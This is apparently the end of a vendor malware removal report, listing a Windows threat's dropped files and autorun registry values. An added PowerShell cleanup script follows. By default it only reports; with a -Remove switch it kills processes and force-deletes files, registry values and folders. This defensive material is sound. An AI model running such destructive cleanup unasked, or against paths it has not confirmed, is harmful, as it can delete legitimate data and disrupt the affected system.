C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\g1mavwlqh0w\52p1njv1z5v.exe (204 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\g1mavwlqh0w\52p1njv1z5v.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)
%Program Files%\VIKAUDDVJG\uninstaller.exe.config (1 bytes)
%Program Files%\VIKAUDDVJG\VIKAUDDVJ.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\SecondL.exe (208 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\SecondL.exe.config (1 bytes)
C:\config.conf (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\Sho9libi.exe (227194 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\Sho9libi.exe.config (1 bytes)
%Program Files%\VIKAUDDVJG\cast.config (37 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"drg0zk23g1j" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\g1mavwlqh0w\52p1njv1z5v.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_GN80Z" = "C:\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Y8LH5W7H9S9CA9N" = "%Program Files%\VIKAUDDVJG\VIKAUDDVJ.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
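The manual steps above, carried out as one script: it sweeps the host for the processes, dropped files and autorun values listed in this report, prints what it found, and only removes them when run with -Remove (or previews the removal with -WhatIf). This is an added example, not part of the Lavasoft report. It assumes the report's paths map to the standard %APPDATA%, %TEMP% and %ProgramFiles% locations, and that OneTwo.exe sits beside its OneTwo.exe.config in the Temp folder, which the report does not state explicitly.

```powershell
# Added example, not part of the Lavasoft report: sweep a host for the indicators
# in the removal steps and, only with -Remove, clean them up. Run elevated.
#   .\Remove-Temonde.ps1                    # report only
#   .\Remove-Temonde.ps1 -Remove -WhatIf    # preview removals
#   .\Remove-Temonde.ps1 -Remove            # stop processes, delete files/values
[CmdletBinding(SupportsShouldProcess)]
param([switch]$Remove)

# Process image names from the report (the original dropper's name varies).
$ProcessNames = 'SecondL', 'Sho9libi', 'OneTwo', '52p1njv1z5v', 'VIKAUDDVJ'

# Dropped files from the report. The *.config.cch.new files under the .NET
# Framework and "CLR Security Config" folders are left out: they are CLR
# security-policy caches that any .NET 2.0 program rewrites, not payload.
# OneTwo.exe's location is assumed from its .config (report lists only the .config).
$Files = @(
    "$env:APPDATA\g1mavwlqh0w\52p1njv1z5v.exe"
    "$env:APPDATA\g1mavwlqh0w\52p1njv1z5v.exe.config"
    "$env:ProgramFiles\VIKAUDDVJG\VIKAUDDVJ.exe"
    "$env:ProgramFiles\VIKAUDDVJG\VIKAUDDVJ.exe.config"
    "$env:ProgramFiles\VIKAUDDVJG\uninstaller.exe.config"
    "$env:ProgramFiles\VIKAUDDVJG\cast.config"
    "$env:TEMP\NAZ7U0Z6EK\SecondL.exe"
    "$env:TEMP\NAZ7U0Z6EK\SecondL.exe.config"
    "$env:TEMP\NAZ7U0Z6EK\Sho9libi.exe"
    "$env:TEMP\NAZ7U0Z6EK\Sho9libi.exe.config"
    "$env:TEMP\NAZ7U0Z6EK\OneTwo.exe"
    "$env:TEMP\NAZ7U0Z6EK\OneTwo.exe.config"
    'C:\config.conf'
)
$Directories = "$env:APPDATA\g1mavwlqh0w", "$env:ProgramFiles\VIKAUDDVJG", "$env:TEMP\NAZ7U0Z6EK"

$Autoruns = @(
    @{ Key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run';     Name = 'drg0zk23g1j' }
    @{ Key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run';     Name = 'Y8LH5W7H9S9CA9N' }
    @{ Key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'; Name = 'OMEWPRODUCT_GN80Z' }
)

$findings = New-Object System.Collections.Generic.List[object]

# 1. Processes first, so files they hold open can be deleted afterwards.
foreach ($p in Get-Process -Name $ProcessNames -ErrorAction SilentlyContinue) {
    $findings.Add([pscustomobject]@{ Type = 'Process'; Item = "$($p.ProcessName).exe (PID $($p.Id))"; Detail = $p.Path })
    if ($Remove -and $PSCmdlet.ShouldProcess("$($p.ProcessName) PID $($p.Id)", 'Stop-Process')) {
        Stop-Process -Id $p.Id -Force
    }
}

# 2. Dropped files; keep a SHA-256 of each before deletion for the incident record.
foreach ($f in $Files) {
    if (-not (Test-Path -LiteralPath $f -PathType Leaf)) { continue }
    $hash = (Get-FileHash -LiteralPath $f -Algorithm SHA256).Hash
    $findings.Add([pscustomobject]@{ Type = 'File'; Item = $f; Detail = $hash })
    if ($Remove -and $PSCmdlet.ShouldProcess($f, 'Remove-Item')) {
        Remove-Item -LiteralPath $f -Force
    }
}

# 3. Autorun values. The RunOnce value points at the original dropper, whose
#    file name is not fixed, so its data is reported rather than hard-coded.
foreach ($a in $Autoruns) {
    $data = (Get-ItemProperty -Path $a.Key -Name $a.Name -ErrorAction SilentlyContinue).($a.Name)
    if ($null -eq $data) { continue }
    $findings.Add([pscustomobject]@{ Type = 'Autorun'; Item = "$($a.Key)\$($a.Name)"; Detail = $data })
    if ($Remove -and $PSCmdlet.ShouldProcess("$($a.Key)\$($a.Name)", 'Remove-ItemProperty')) {
        Remove-ItemProperty -Path $a.Key -Name $a.Name
    }
}

# 4. Drop folders last, once their listed contents are gone.
foreach ($d in $Directories) {
    if (-not (Test-Path -LiteralPath $d -PathType Container)) { continue }
    $count = (Get-ChildItem -LiteralPath $d -Recurse -File | Measure-Object).Count
    $findings.Add([pscustomobject]@{ Type = 'Directory'; Item = $d; Detail = "$count file(s) remaining" })
    if ($Remove -and $PSCmdlet.ShouldProcess($d, 'Remove-Item -Recurse')) {
        Remove-Item -LiteralPath $d -Recurse -Force
    }
}

if ($findings.Count -eq 0) { 'No indicators from the report were found on this host.' }
else { $findings | Format-Table -AutoSize -Wrap }
```

Run it without -Remove first and keep the printed hashes and autorun data: the RunOnce value reveals where the original dropper was saved, which the report can only give as %original file name%.exe. After -Remove, reboot as the steps say and run the script once more to confirm the Run values have not been recreated by a process the sweep missed.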